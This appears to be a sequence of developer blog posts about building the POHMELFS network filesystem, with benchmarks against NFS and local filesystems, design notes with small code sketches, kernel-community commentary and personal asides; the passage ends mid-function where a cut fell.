POHMELFS random read speed is lower, and that is the task with the highest priority now,
especially compared to local FS results. POHMELFS random write is slightly faster than NFS.
For comparison, local filesystem, used for tests. mkfs.xfs -d agcount=75 -l size=64m /dev/sdc1;
mount -o logbufs=8,nobarrier,noatime,nodiratime,osyncisdsync /dev/sdc1 /mnt/:
Write requests are sent to multiple servers and completed only when all of them sent an ack.
Ability to add and/or remove servers from working set at run-time from userspace (via netlink,
so the same command can be processed from real network though, but since server does not support it
yet, I dropped network part).
Documentation (overall view and protocol commands)!
Rename command (oops, forgot it in previous releases :)
Several new mount options to control client behaviour instead of hardcoded numbers.
Bug fixes.
I will complete the documentation in a few moments and send this release to the mailing lists.
Very likely it is the last non-bugfix release of the kernel client side; the next release will incorporate
features needed for distributed parallel data processing (like the ability to add new servers via a network
command from other servers), so most of the work will be devoted to server code.
Essentially that's it, I believe most of the features I wanted
from a network distributed parallel filesystem, which should live
in the client, are already implemented in POHMELFS.
The client has the following features (if I did not forget something interesting;
only those interesting from the parallel point of view are listed):
Automatic failover reconnect to the same server.
Run-time addition/removal of the servers from the working set
(only via userspace command, since server does not support that yet,
but addition is trivial).
Transactions support. Full failover for all operations. Resending transactions to different servers on timeout or error.
Load balancing of reading (directory reading and lookups inclusive) requests and
simultaneous writing to all servers in current working set.
It is damn fast (but remember that random reading
is not yet optimal enough, and in
the last tests it was slower than NFS).
The userspace server meanwhile does not support lots of features it has to support
to be called a complete parallel distributed solution, and the main work should now
be concentrated on it.
Main missing (and the most complex) features are:
Distributed data coherency protocol like PAXOS for server data, stored on multiple machines.
Ability to mirror data itself on multiple machines.
So, likely release will see the light tomorrow or Friday.
And yes, very likely Linux kernel community lost me (and I do believe
none cares as long as me).
But not Linux kernel, it is definitely the place I like.
People, who want to hack on Linux kernel will do that without all
that empty talks and brilliant ideas, all of which are only aimed in
a single direction: do what we will ask you to do for us. Be fair and
admit that you do not want new ideas implemented, you want old bugs (introduced
by someone else) fixed only, so that kernel got more respect without
possible additional work for you.
It is not how interested people work, instead they just decide themselves
how and what to do. That's why the kernel janitor project did not succeed:
it is not interesting for anyone. The same applies to its refocus on bugfixes.
And I do know what kernel janitorial work is: I started with that not so long ago, fixing
trivial error checks like request_region()/check_region() code
and other minor things like PCI remap errors.
That was a hell of crap. Frequently there was a situation
when I fixed lots of (like 20 or more) drivers in one go and submitted a patch,
and was then asked to split it into separate patches, to add each driver maintainer
to the copy, wait for their ACKs, resubmit and so on. And it frequently happened
(especially when a new feature was introduced and lots of small pieces of code had to be changed
a little) that while I did that, some other known kernel hacker did the same, and his
patch was immediately applied.
Janitorial and all hypocrisy about 'we want more developers' just suck.
My advice for those who really want to hack on kernel: just do what you like,
try yourself in whatever subsystem you want, implement your ideas, be creative and do
whatever you like with kernel and not what all those kernel heads tell you to do.
The only way to succeed is to move forward!
Argh, and do not listen to any advice of this kind at all :)
POHMELFS
got ability to add/remove servers in run-time (although not via network command,
since I do not know, how to test it yet), but via netlink interface. The same
message can be passed via network though, so it will be simple to extend.
Also, POHMELFS got readahead support via ->readpages()
callback. I removed AIO reading from POHMELFS in favour of readahead
and got excellent result in sequential reading: 3-3.5 times faster than NFS
and essentially reaching disk IO bandwidth (a bit less though),
but random reading dropped to miserable numbers.
Also, the rewritten reading method should give the system better balancing between multiple
servers, but it will not show any benefit in the single-threaded
iozone benchmark, since it reads data via a single call to read(),
which gets sequential data access, which in turn is faster than network bandwidth.
So multithreaded load should greatly benefit from read balancing, but I did not
test that yet.
I ran sequential read/reread, write/rewrite and random read/write tests for
XFS, Ext4, NFS (over XFS) and POHMELFS (over XFS) with 1Gb of RAM and 8Gb
of test files (to eliminate VFS caching influence) with 8Kb to 1Mb record size.
Results exist in text files in standard iozone output format, but since I'm learning
LISP I decided to write a graph generator (via gnuplot) using my very basic
knowledge of this language, so nice graph results can take a while...
Also, tomorrow morning I will fly away to my friend's wedding and will only
return on Monday the 9th. I will not have internet access there, only lots of fun.
Now they eat less memory, and a single writing transaction can accumulate
up to 1024 pages. This can be further tuned, especially for small requests
mixed with sync. Currently a writing transaction is allocated for its maximum
size, and then page pointers are written to the allocated area, so
if the number of dirty pages requiring writeback is small, quite a lot of
space will be wasted.
It is a task for the next optimization; nevertheless, sequential
writing is currently limited only by disk throughput, or by network bandwidth in case of
multiple servers, since the link
is shared between machines, so effective bandwidth becomes equal
to GigE/number of servers, or about 60 MB/s in my environment with two servers
and a single client.
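The "GigE/number of servers" estimate is plain arithmetic. The sketch below assumes the raw 1 Gbit/s line rate and ignores protocol overhead, which is why it gives slightly more than the roughly 60 MB/s seen in practice.

```python
GIGE_BITS_PER_SEC = 1_000_000_000  # raw line rate, protocol overhead ignored

def per_server_write_bandwidth_mb(servers, link_bits_per_sec=GIGE_BITS_PER_SEC):
    """Upper bound in MB/s for each copy when one client link feeds all servers."""
    return link_bits_per_sec / 8 / 1_000_000 / servers

two_servers = per_server_write_bandwidth_mb(2)
```

With two servers the bound is 62.5 MB/s, since every written byte crosses the client link twice.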
Also, the reading path was not changed at all (only transaction
internals) - there is still no readahead
and a new transaction is allocated for each page to be read. Nevertheless,
see how reading was improved: POHMELFS not only outperformed NFS again,
but reached the disk bandwidth limit already for 16Kb requests (almost two
times faster than NFS). Table shows IO throughput in KB/s.
I will create nice graphs out of these tables and also will include
optimized reading tests (tomorrow likely) and two data server results.
What also should be done, is testing with either bigger files or smaller
amount of ram and thus smaller VFS cache size. As you saw in all tests, when
lots of reads start to hit the cache, picture becomes completely non-informative
for filesystem behaviour. So I want to limit all three testing machines
to 1Gb of RAM (booting with mem=1G parameter) and perform the same iozone
bench for 8Gb file. Results should be more realistic.
In parallel I will implement userspace run-time server addition/removal
command, which will also be used as-is for network message from one
or another server, connected before. With optimized reading transactions
it will be a good ground for the next POHMELFS release. So I plan to schedule
it to thursday or middle of the next week, since I will be on small vacation
jun 6-9.
- So again, can you offer an alternative?
- Just give up on this dumb idea completely.
It is not about AppArmor in general (although maybe about it too), but about security hooks which provide
path information into inode callbacks. There are pros and cons for this decision,
but things look like path based security hooks will not be accepted.
There is a really trivial way to fix it. No kidding, it is simple: create your own
name cache and do not bind it to dentries, but instead index it by inode number.
This allows you to have whatever callbacks and information you want in strictly
bound VFS operations. Need to have path info in ->inode_create()?
Put it into your own tree indexed by the inode number of the parent inode, look that data up in the
security hook and make a decision. Yes, it is slower, but active security was never
a fast solution. It still goes against the rules others created for security-based
systems, but formally it stays within all the boundaries of the created (maybe ugly
for someone) interfaces.
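The idea can be modelled in a few lines of userspace code. This is only a sketch of the data structure: the class, the hook function and the prefix-based policy are invented for the example and have nothing to do with the real LSM interfaces.

```python
class InodeNameCache:
    """Private name cache indexed by inode number instead of dentries."""

    def __init__(self):
        self._paths = {}

    def remember(self, ino, path):
        self._paths[ino] = path

    def forget(self, ino):
        self._paths.pop(ino, None)

    def path_for(self, ino):
        return self._paths.get(ino)

def may_create(cache, parent_ino, name, denied_prefixes):
    """Hypothetical hook: rebuild the path from the parent inode and decide."""
    parent = cache.path_for(parent_ino)
    if parent is None:
        return True  # assumption: unknown parents are not covered by the policy
    full_path = parent.rstrip("/") + "/" + name
    return not any(full_path.startswith(prefix) for prefix in denied_prefixes)

cache = InodeNameCache()
cache.remember(2, "/")
cache.remember(1042, "/etc")
allowed = may_create(cache, 2, "notes.txt", ["/etc/"])
denied = may_create(cache, 1042, "shadow.new", ["/etc/"])
```

The extra lookup per hook call is the slowdown mentioned above.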
And I will not point to project, which already uses such approach in different area
though :)
It is interesting to implement your ideas not by breaking something (although sometimes
it is needed, but that's likely an exception or when you are hacking a deeply internal kernel
part), but instead by hacking around existing limitations.
I think I found a way to make progress in my trumpet playing exercises
(read: ear-scratching screaming, it sounds much worse than a wrong note on a piano).
It is practice of course, but even without the whole tube and using only the mouthpiece I can train
the breathing path. Musicians have several hours of exercises per day, kernel hackers about half an hour each morning
in parallel with listening to AC/DC and Metallica as an alarm clock. The mouthpiece is rather quiet (noticeably
louder than usual talk though), but produces about the same resistance to air flow, so I think
it is good training. When the embouchure is stable enough I will attach the trumpet, since currently
the sound frequently drops and jumps. Nevertheless I made big progress (I think so at least) after starting
such training recently.
My home guardian Socket, although he does not have ears, looks like he does not like it. Although he only likes
to eat.
- If you haven't noticed, I don't take "no" for an answer,
- And now please tell us step 2 in your secret plan to win friends and influence.
- WTF are you getting at?
Fun thread :)
There is actually a serious problem in the kernel community: when some new idea is being implemented
and it goes against something which sits in the mind of one or another big kernel hacker out there,
and such a person replies that this is a bad idea (sometimes without technical arguments), people
just stop looking at replies and do not follow the arguments of the author, simply because they frequently do
not know the area in question well enough to make a decision and thus rely on others.
This only works when 'others', i.e. core kernel maintainers, are good, do not base their decisions
on personal feelings and only take the technical side into account. Unfortunately it is not always the case,
and political methods are used. Sometimes even only political methods are used...
Usually you will not see bad benchmark results for a technology under
development, but any such result is actually a _very_ good result
for a work-in-progress and not yet completed system. It allows one
to see how new proof-of-concept code compares
with an already completed, tuned and optimized system.
Conclusions drawn from such test results lead to really superior decisions.
Let's compare iozone read/reread, write/rewrite and random
read and write for POHMELFS and NFS with 8Gb test files and
different record sizes (from 8Kb to 1Mb) on XFS over the GigE link.
I described the hardware and local iozone benchmark results in detail
previously.
Now it's time for network tests.
Async NFS in-kernel server results.
Sequential writing is 10-15% faster for POHMELFS (and limited by the underlying
fs speed), while random writing
is essentially the same and is limited by disk speed. But sequential reading
is _much_ worse for small requests. The reason is simple: POHMELFS does not support readahead,
since it does not have a ->readpages() callback, so any
sequential access ends up as a set of ->readpage() callbacks,
each of which waits for its completion, which is slow; readahead
is currently not invoked from the reading path.
I could not resist highlighting that big
requests are 1.5-2 times faster for POHMELFS than for NFS :)
and are also limited by the underlying filesystem.
One can note that
NFS random reading results are actually better than local filesystem behaviour,
and very noticeably better. Why does a local filesystem behave worse than
the same filesystem mounted via NFS in random reading?
I believe that's because in the network case we actually have double buffering:
on the client, where the most active pages are in RAM, and on the server, where
readahead populated pages which are not active (since active pages are being
read from the client's cache, they will be evicted from the server's page cache,
because the client will not try to read them from the server). But those server pages
which are not active currently will be accessed soon by the client, when it reads
the next portion of the random data, and that will be a very fast access to RAM.
So we have a really good caching scheme, where the most actively used pages are
in client RAM and are flushed to disk on the server, and the server instead populates
other, less active pages via readahead.
This reading behaviour is just a result of the not yet completed VFS callback implementation
in POHMELFS. With ->readpages() in place it will be faster than
NFS even in this bench. Also POHMELFS has multiple-server parallel read balancing and
simultaneous writing to them, but there are no results yet.
I already created a mental model of the optimized read and write transactions (based
on memory pools for maximum OOM-robustness and small memory usage overhead), so
in a day or two it will be implemented in code.
Stay tuned, now it's time for excellent POHMELFS results!
Screaming, drinking, cheering...
Although I was not there today, since
some friends became ill and others moved to their tasks,
it still was really cool (yesterday).
My congratulations to the team and department itself :)
Match of the century - 24 hours of football in my
Alma Mater.
Today the Department of Quantum and Physical Electronics (which I finished
I do not even remember when, but I started studying at MIPT 10 years ago) plays against
the axes, or by their other name: the Department of General and Applied Physics.
After about half of the match we were winning by 18 goals (31:13).
This happens once per year and I usually try to get to MIPT and
watch part of the game, like this year. Tomorrow I will go there too of course
to meet old friends and celebrate the win!
I promised to publish POHMELFS parallel processing results yesterday,
even if they are miserable. Unfortunately there are no interesting results
at all. In the released version POHMELFS is 32-bit only, since it does
not have a special ->open() callback which forces files to be opened
with the O_LARGEFILE flag to support sizes of more than 4Gb (actually only 2Gb,
since kernel uses signed size_t, which is only 31 bit large), and
the superblock maximum size is set to 32 bits,
so all 32-bit results are not very interesting: a 2Gb/s random
read speed is a really stupid claim, since all reading happened from the cache.
While results with more than 2Gb are... Let me first show you how XFS and Ext3 behave
in case of random writes.
A short preface.
Hardware used in testing: 4-way Intel E7520 system (two logical and two physical CPUs)
3Ghz 32 bit Xeons with 8gb of ram, Adaptec AIC7902 Ultra320 SCSI adapter with
SEAGATE ST3300007LC 10k rpm 300 Gb testing disk. Its linear reading speed
is about 90 MB/s. Dmesg:
Kernel version is 2.6.25 (and 2.6.24 for the first ext3 test).
I used two such machines as servers for iozone
read/reread, write/rewrite and random read/write testing. File size is limited to 8Gb only,
since it is the only interesting fair case, record size varies from 8Kb to 1Mb.
Before I started 8Gb POHMELFS testing, I decided to check how local filesystem behave in such scenario.
XFS was tuned this way: (mkfs.xfs -d agcount=75 -l size=64m /dev/sdc1;
mount -o logbufs=8,nobarrier,noatime,nodiratime,osyncisdsync /dev/sdc1 /mnt/)
Ext3 was created and mounted with default options on machine with only 4Gb of RAM though.
So, testing.
Here is the results table from iozone (before I interrupted it) with read/reread, write/rewrite
and random read/write tests for XFS (either default, or tuned like on link above).
Do you really want to know ext3 speed? Pregnant kids and women should skip next paragraph.
I interrupted the test after almost 2 (!) hours of random writing
of an 8Gb file with 8Kb records on default ext3. The test was not completed and I do not really
know its performance (note that this machine has only 4Gb of RAM, other hardware details were
described above), but it will be less than 1 MB/s.
Ext4 behaves much better in this aspect (mount options: rw,noatime,data=writeback,extents):
I hate laziness, but sometimes drop into that hole... So the last couple of days
I just stupidly wasted my time (well, I read about Lisp and failed to find a GTK binding for CLISP,
wrote some code and a kernel bug fix, but that does not count).
Today laziness started to be really boring, so I made some small progress in
POHMELFS
parallel processing.
It got the ability to send transactions to multiple servers by default and balance reading
between them (so far it always reads from the first server, and in case of error it switches
to the second, but it is trivial to change). This was implemented via special routes for each
transaction, which are stored per network state, so if one of the servers did not answer,
we would not resend data to the others. It also makes trees smaller, which should allow faster
reading in case of lots of pending writing transactions.
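What read balancing with failover could look like is sketched below. It models the "trivial to change" variant (round-robin start, then fall through to the next server on error), not the current first-server-only behaviour; servers are modelled as plain callables and all names are invented for the example.

```python
import itertools

class ReadBalancer:
    """Rotate the first server for each read and fail over to the rest on error."""

    def __init__(self, servers):
        self.servers = list(servers)
        if not self.servers:
            raise ValueError("at least one server is required")
        self._start = itertools.cycle(range(len(self.servers)))

    def read(self, request):
        start = next(self._start)
        last_error = None
        for offset in range(len(self.servers)):
            server = self.servers[(start + offset) % len(self.servers)]
            try:
                return server(request)
            except OSError as err:
                last_error = err  # this server failed, try the next one
        raise OSError("all servers failed") from last_error

# Hypothetical servers: one is down, one answers.
def broken_server(request):
    raise OSError("connection reset")

def working_server(request):
    return b"data:" + request

balancer = ReadBalancer([broken_server, working_server])
first = balancer.read(b"page0")   # starts at the broken server, fails over
second = balancer.read(b"page1")  # starts directly at the working server
```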
Code is in testing stage currently. I will complete read balancing tomorrow and test it against
multiple servers on different machines, with data placed on disk, so that random access
would be slow. Having two servers I expect to get a linear speed increase. If the test turns out to be disk
IO bound, it is possible to add multiple servers on the same machine, so that each server would
run on its own disk (I have two reasonably fast SCSI disks on each testing machine).
Results will be published here of course (well, even if they are miserable :).
#!/usr/bin/clisp
(defun f (m)
(do ((k 0 (1+ k))
(c 0 n)
(n 1 (+ c n)))
((eql k m)
(format t "~r" c))))
(f 317)
Guess the result: seven hundred and ninety-three vigintillion, five hundred and ninety-one novemdecillion, four hundred and seven octodecillion, eight hundred and four septendecillion, one hundred and fifty-one sexdecillion, nine hundred and twenty-six quindecillion, five hundred and ninety-three quattuordecillion, seven hundred and ninety-three tredecillion, forty-two duodecillion, one hundred and twenty-six undecillion, eight hundred and ninety-one decillion, one hundred and twenty-eight nonillion, eight hundred and nineteen octillion, six hundred and ten septillion, seven hundred and ten sextillion, one hundred and forty quintillion, one hundred and forty-five quadrillion, thirty-seven trillion, nine hundred and fifty-eight billion, two hundred and seventy-three million, seven hundred and seventy-seven thousand, three hundred and ninety-seven
Irish Tullamore Dew helped this
POHMELFS
release to see the light.
Short changelog:
Full transaction support for all operations (object creation/removal, data reading and writing).
Data reading transactions are not optimal yet and will be improved in the next release (although fast).
Data and metadata cache coherency support. More details on how this is implemented
one can find in appropriate
section.
Transaction timeout based resending. If given transaction did not receive reply after specified
timeout, transaction will be resent (possibly to different server).
Switched writepage path to ->sendpage() which improved performance and robustness
of the writing.
Preliminary support for parallel data processing. Code to write data to multiple servers in parallel
and balance reading between them was imported, but is not used right now.
Fair number of bugfixes.
Next release is scheduled for the beginning of the next month, and will likely include following features:
Improved reading transactions.
Server redundancy extensions (ability to store data in multiple locations according to regexp rules,
like '*.txt' in /root1 and '*.jpg' in /root1 and /root2).
Client parallel extensions: ability to write to multiple servers and balance reading between them.
Code was imported to the current version, but not enabled yet.
Client dynamical server reconfiguration: ability to add/remove servers from working set by server command
and from userspace.
Start generic server distribution development.
As usual one can grab the latest source from
archive or
GIT tree.
But no, it is scheduled for tomorrow because of the very interesting way I decided
to implement reading transactions. The way it works right now is quite miserable,
so I want to clean things up and make a really good patch.
Page reading code will create single transaction for the bunch of pages and will schedule
next one if pages are not yet received instead of waiting for transaction to be completed,
and only wait at the very end (if needed). With addition of
async copy
from receiving kernel thread into reading userspace via copy_to_user() (in todo),
this will become, I think, the fastest possible way of reading over the net.
So far changelog contains following items:
Full transaction support for all operations (object creation/removal, data reading and writing).
Data reading transactions are not optimal yet and will be improved in the next release.
Data and metadata cache coherency support. More details on how this is implemented
one can find in devel
section.
Transaction timeout based resending. If given transaction did not receive reply after specified
timeout, transaction will be resent (possibly to different server).
Switched writepage path to ->sendpage() which improved performance and robustness
of the writing.
iput() is a very tricky call in the Linux VFS:
besides dropping the inode when its reference counter
reaches zero, it also waits until all associated pages are
flushed to storage.
POHMELFS uses a single thread per network state (network connection structure),
which only reads async replies from the server. So it is possible
that a reply which requires iput() (for example a create command
reply) arrives in parallel with object removal, so the inode is deleted
but not yet freed. When the reply is received and iput() is called,
it will try to free the inode and wait until all pages associated with its mapping
are synced. But page sync happens on the reply to another command (consider for
example several writeback transactions), which can not be processed, since the thread
is waiting for them to complete. This problem can not be fixed by introducing
multiple threads, since each one can end up in exactly the same situation simultaneously.
So we should not grab the inode and free it in the receiving path.
This is ok for writeback transactions, since the inode can not be freed until its pages are synced,
so just by holding pages we avoid the deadlock. But object creation for empty files
or directories does not have pages attached, so they have to be synced with a special
transaction. There can still be a problem with an empty file though: some pages can be
attached and it can be removed while the system waits for the creation transaction to complete.
But actually we do not need to know about that: we should not grab the inode at all,
since the transaction already contains all the needed info, namely the inode number, so we can look up
the inode (if it still exists) and mark it as created without the deadlock-prone grab/put.
This bit took me the last three days, during which POHMELFS moved to non-blocking receiving and
timeout-based sending (and back again). It got a scanning 'watchdog' which resends transactions
if they were not acked after some time and eventually drops them if they still do not get
a reply. POHMELFS also got a couple of new operations supported, and likely something else on top of the existing set
of features implemented to date (full transaction support for all operations
and the data and metadata coherency protocol were added for the next release).
The new release is scheduled for the end of the week, and there is no readpage transaction support yet...
So, stay tuned!
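The resend-and-drop 'watchdog' mentioned above can be sketched roughly like this. It is plain Python rather than kernel C, and every name in it (`Transaction`, `scan`, the `timeout` and `max_retries` parameters) is invented for illustration; it is not the POHMELFS code.

```python
from dataclasses import dataclass

@dataclass
class Transaction:
    tid: int            # monotonically increasing transaction id
    sent_at: float      # time of the last (re)send
    retries: int = 0    # how many times it has been resent already

def scan(inflight, now, timeout, max_retries, resend):
    """One watchdog pass over the in-flight transactions (dict: tid -> Transaction).

    Transactions not acked within `timeout` are resent via `resend(t)`;
    those already resent `max_retries` times are dropped instead.
    Returns the list of dropped transactions.
    """
    dropped = []
    for tid in sorted(inflight):        # oldest ids first
        t = inflight[tid]
        if now - t.sent_at < timeout:
            continue                    # still waiting for its ack
        if t.retries >= max_retries:
            dropped.append(inflight.pop(tid))
            continue
        t.retries += 1
        t.sent_at = now
        resend(t)
    return dropped
```

An acked transaction would simply be removed from `inflight` by the receiving side, so the watchdog never sees it again.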
$ clisp
i i i i i i i ooooo o ooooooo ooooo ooooo
I I I I I I I 8 8 8 8 8 o 8 8
I \ `+' / I 8 8 8 8 8 8
\ `-+-' / 8 8 8 ooooo 8oooo
`-__|__-' 8 8 8 8 8
| 8 o 8 8 o 8 8
------+------ ooooo 8oooooo ooo8ooo ooooo 8
Welcome to GNU CLISP 2.42 (2007-10-16)
Copyright (c) Bruno Haible, Michael Stoll 1992, 1993
Copyright (c) Bruno Haible, Marcus Daniels 1994-1997
Copyright (c) Bruno Haible, Pierpaolo Bernardi, Sam Steingold 1998
Copyright (c) Bruno Haible, Sam Steingold 1999-2000
Copyright (c) Sam Steingold, Bruno Haible 2001-2007
Type :h and hit Enter for context help.
[1]> (defun test-func () (format t "It's a test func"))
TEST-FUNC
[2]> (test-func)
It's a test func
NIL
[3]> (exit)
Bye.
This one has, imho, the least ugly command line... And I'm against SLIME
and Emacs. Also tried SBCL, GNU CL and something else, but likely CLISP will
stay.
Instead of sleeping (it will be time to wake up soon in Moscow slums) or at least
catching
POHMELFS
bugs (the last several days were solely devoted to this task, and a fair
number of them were fixed, as well as some interesting (probably new) features introduced,
so a new release will likely see the light later this week),
I'm drinking some beer and making my first steps into this. So far it looks quite new and probably
interesting, but every introductory article about it I read said that if you are over 25 years old,
it is likely impossible to change something in your perception. I'm over, but I think that
it will be fun and will probably become a really good tool for me.
The more I think about it, the more interesting tasks (as well as those I'm already thinking
about, like
CAPTCHA) I find...
It was a rather simple task thanks to async event processing support.
Each time a client creates, reads or writes an object on the server, information about
its interest is stored on the server. When any other client updates the same
object (changing attributes or writing data), all interested clients
get notifications with the new data (new attributes, or in case of writing
possibly the new size and a flag telling which page has to be fetched from the server,
since it is not valid anymore). Writing happens during writeback as before,
so a command like "echo Some_message > /mnt/file" immediately
syncs the size of the file to zero and writes the actual data there some time later,
when the system decides to start writeback.
Also ported all commands but one to the transaction mechanism, which means
they all will be resent if the currently active network connection goes down.
Most of the commands are not synchronous, and thus will not be resent after a
timeout, but this can be trivially changed if there is major demand for that.
Only reading has not yet been ported to the transaction model, which is the next task
to complete. These transactions have to be synchronous, since we do want to read
data, while we do not actually care about full directory content.
These changes have to be seriously tested and all problematic places resolved.
For example they slow down metadata operations noticeably, since the system now
sends a message each time a new object is created: kernel archive
untarring now takes about 5 seconds against the previous 2-3 (including sync)
on a 4-way machine with 8 GB of RAM. Although that is still not comparable to the 30+ seconds
for async NFS, it has to be investigated further.
After full move to transaction model and cache coherency testing (that model
may be not complete for some usage, since locks are not yet supported),
POHMELFS
will make its first steps into distributed area...
So, the server now contains all metadata information about an object updated on a client.
pohmelfs_setattr() is synchronous for remotely read inodes
and for already synced inodes which were originally created locally. It does nothing
if the object is not yet synced to the server, since syncing will provide that info
itself.
The only missing thing is to asynchronously broadcast that data to other clients, which requires
creating a cache of objects that are interesting for a given client. Each client will be automatically
added to the group of interests when it looks up an object, so when an attribute of the given object is being
set, the update will be sent to interested parties. A client will be dropped from the group of interests when
it drops the appropriate inode locally (which will force sending a special message).
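A minimal sketch of such a group of interests, assuming the server keeps a simple map from object id to the set of interested clients. The class and method names (`InterestTable`, `lookup`, `drop`, `setattr`) are hypothetical and only illustrate the bookkeeping, not the real server.

```python
from collections import defaultdict

class InterestTable:
    """Server-side map: object id -> set of clients interested in it."""

    def __init__(self):
        self.groups = defaultdict(set)

    def lookup(self, client, obj):
        # A lookup implicitly subscribes the client to the object.
        self.groups[obj].add(client)

    def drop(self, client, obj):
        # Triggered by the special message a client sends when it drops the inode.
        self.groups[obj].discard(client)
        if not self.groups[obj]:
            del self.groups[obj]

    def setattr(self, writer, obj, attrs):
        # Returns (client, attrs) notifications for everyone except the writer.
        return [(c, attrs) for c in sorted(self.groups.get(obj, ())) if c != writer]
```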
I installed the water system for the shower and thought about installing
the whole cabin, but found (as usual) that I do not have drills
for ceramic tiles. So, that will be postponed for a while.
Also I expect glue for ceramic tiles to be delivered today (as well
as brick tiles), so that I can start covering the hall with granite. Although
I'm a bit tired after the water system installation, which took the major
part of the day.
It is actually a simple task, but only when you have easy access to
all the parts. Now imagine a 10 cm thick wall, where you managed to drill
two holes, each one about 2 cm in diameter (less than two fingers thick).
A meter below and to the left there is a bigger hole for the sanitary system (about
15x15 cm). The water system hatch is located 2.5 meters to the right of it.
The task is to run thin water tubes from the water hatch to the two small holes,
with the splitter installed near the bigger sanitary hole. Without
direct access to any tube (you can only feel it, not see it) you have to
connect them (I also need to mention that it is quite hard to put
both hands into the bigger hole for the sanitary system) via different connectors
using spanners.
I've completed the task, although I'm not sure if it is really safe. That was
challenging and exhausting, so probably I will just slack this evening
and hack some bits of captcha.
Will also cover my table with the last colour level (yes, yes, it is still
not done) and/or fill second varnish layer for x-shelves (they look really cool
after mordant and varnish)...
After healthy discussion
started after my announcement of the second POHMELFS release,
it's time to highlight the main ideas settled in the thread.
First, POHMELFS will move towards parallel distributed filesystems, while still
being very good as a network filesystem. In particular, that will include the ability
to read data from any of the connected servers (not only from the currently active one,
as it is done right now); writing will happen to all connected servers simultaneously
(and the transaction will be committed after all servers have returned a completion acknowledge).
The protocol will be extended to support dynamic addition and removal of servers to/from
the currently connected group. Probably there will be some kind of status messages for servers
(i.e. going offline, do not send me data, or I'm becoming slow, do not read from me
and so on). It will be done in addition to cache coherency messages (which I have yet to implement;
because of other tasks this was a bit postponed, probably to the weekend), which
will include two types of requests: page invalidation and inode update (that will
also mean that POHMELFS will start supporting attributes (maybe even extended ones),
right now it doesn't :). Such a cache coherency protocol should scale better
than classical MOSI (and its derivatives) and particularly better than what the pNFS spec
provides (leases to operations for some servers), since it is still possible to work in
parallel with the same file, especially without any overhead if data processing
does not cross different client boundaries, but it has to be tested in practice.
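The "write to all, read from any" idea can be illustrated with a small sketch. Here a server is modelled as a callable that returns True when it acknowledges the data; `write_all` and `pick_reader` are made-up names, and the round-robin read choice is just one possible balancing policy, not something the thread settled on.

```python
def write_all(servers, data):
    """Send `data` to every connected server (dict: name -> send callable).

    The transaction counts as committed only if all servers acknowledge
    it; the names of the servers that failed are returned for a retry.
    """
    failed = [name for name, send in servers.items() if not send(data)]
    return (not failed), failed

def pick_reader(servers, counter):
    """Round-robin choice of the server to read from."""
    names = sorted(servers)
    return names[counter % len(names)]
```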
The POHMELFS server will be extended to support distributed facilities. Very likely it will
be some kind of Paxos algorithm, although probably in a very limited mode to begin with.
So far it will be really simple, so that I can touch all its corner cases and find
an optimal development strategy.
All client extensions are rather not that complex, although not always trivial,
so that should not take too much time, so probably you will get something interesting
soon.
Server extensions will be a bit slower, since I will start essentially from the distributed
system ground and gradually move upstairs.
Irish John Jameson (6 years of experience, really good stuff)
brings us this new POHMELFS release.
Main features include:
Fast transactions. System will wrap all writings into transactions, which will
be resent to different (or the same) server in case of failure.
Failover. It is now possible to provide a number of servers to be used in round-robin
fashion when one of them dies. The system will automatically reconnect to the others and send
transactions to them.
Performance. Super fast (close to wire limit) metadata operations over the network.
Thanks to the writeback cache and transactions the whole kernel archive can be untarred in 2-3 seconds
(including sync) over a GigE link (wire limit! Not comparable to NFS).
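The round-robin failover from the feature list can be sketched as follows. This is only an illustration: `send_with_failover` and its `send(server, transaction)` callback are assumed names, and the real client works on network states rather than a plain list.

```python
def send_with_failover(servers, start, transaction, send):
    """Try servers in round-robin order beginning at index `start`.

    `send(server, transaction)` returns True on success. Returns the index
    of the server that accepted the transaction, or None if all failed.
    """
    for step in range(len(servers)):
        idx = (start + step) % len(servers)
        if send(servers[idx], transaction):
            return idx
    return None
```

The returned index would become the new "currently active" server for subsequent transactions.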
The nearest roadmap includes:
Full transaction support for all operations (only writeback is guarded by transactions currently,
default network state just reconnects to the same server).
Data and metadata coherency extensions (in addition to existing commented object creation/removal messages).
Server redundancy.
One can check out POHMELFS homepage
for more details. You can download latest release (against 2.6.25 kernel tree) from
archive or
GIT tree.
I went to the home improvement shop and got zillions of stuff there,
including various colours for the kitchen ceiling and the room's ceiling
plinth, ordered brick-like tiles for the kitchen (about one third of the
walls there will be covered with bricks), got some tools
(like a rubber hammer for the tiles), ordered glue for the
ceramic granite for the hall, also got a shower (yummy, my shower
cabin was delivered today too) and related stuff for the water
system installation.
By the original plan I wanted to install the shower cabin today, but taking
into account the current time, it is too late for loud work,
so I will proceed with my table instead. It will be completed
today, or call me a ... whatever you like (out of curiosity,
is there a dictionary of indecent English words? I know a Russian
one exists).
If things move fast, I will also cover my X-shelves with varnish,
and will probably take some photos...
With new transactions and new waiting mechanism (see below)
system now untars the whole kernel tree in less than 3 seconds
over the GigE link (including subsequent sync, which
takes less than second always), while async NFS (remote side is tmpfs in both cases)
performs that in a bit more than 30 seconds.
In addition POHMELFS write speed is 125 MB/s (wire limit) vs. less
than 90 MB/s in NFS (dd from /dev/zero
with 1 MB block size and 1000 blocks).
That's what I call a good result.
Transaction mechanism invoked in writeback path is now completely
async too, i.e. it does not wait until remote side confirms that
transaction was received and processed, but writeback does not drop
transactions after sending function returned, instead it stores it
in the in-flight storage and proceeds with the next one.
Transaction can accumulate up to 90 pages in a single frame.
When a reply is received, the async thread searches for the given transaction and
completes it (unlocks the page, although that could be done in writeback,
since the page is being copied, cleans up writeback bits, drops it from the
appropriate radix tree and drops the reference counter). If the transaction
was not sent due to some error, the client will try to send it to different
servers; if some error was returned from the server, it will also be resent
to different ones. Since the original writeback path does not know about
in-flight transactions anymore, any timeout has to be checked by a
dedicated thread (or workqueue), which will detect too old transactions
(by simply checking them from the beginning, since each new transaction has
an increased id) and resend them to remote servers.
There is a small problem though: if the object size is more than a single
transaction can accumulate (90 pages), it will be split into several
transactions, where the first one will contain the object creation command
and some data to be written, while the others will contain only data.
If the server runs multiple threads per client (the default is one though),
it is possible that a transaction other than the first will be processed first,
so the server will write some data into a non-existent file and the transaction
will fail. There are two ways to fix this issue: either wait in writeback
on the client until the creation transaction is completed, and then send all the others
as described above, or add the creation command to every subsequent transaction
until the object is created on the server (a special bit is set on the local inode
in that case). Likely the latter is the better option.
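The second option can be sketched like this. The function name, the dictionary layout and the `created` flag (standing in for the special bit on the local inode) are assumptions made for the example; it also assumes the server treats a repeated creation command for an existing object as harmless.

```python
def split_into_transactions(npages, created, max_pages=90):
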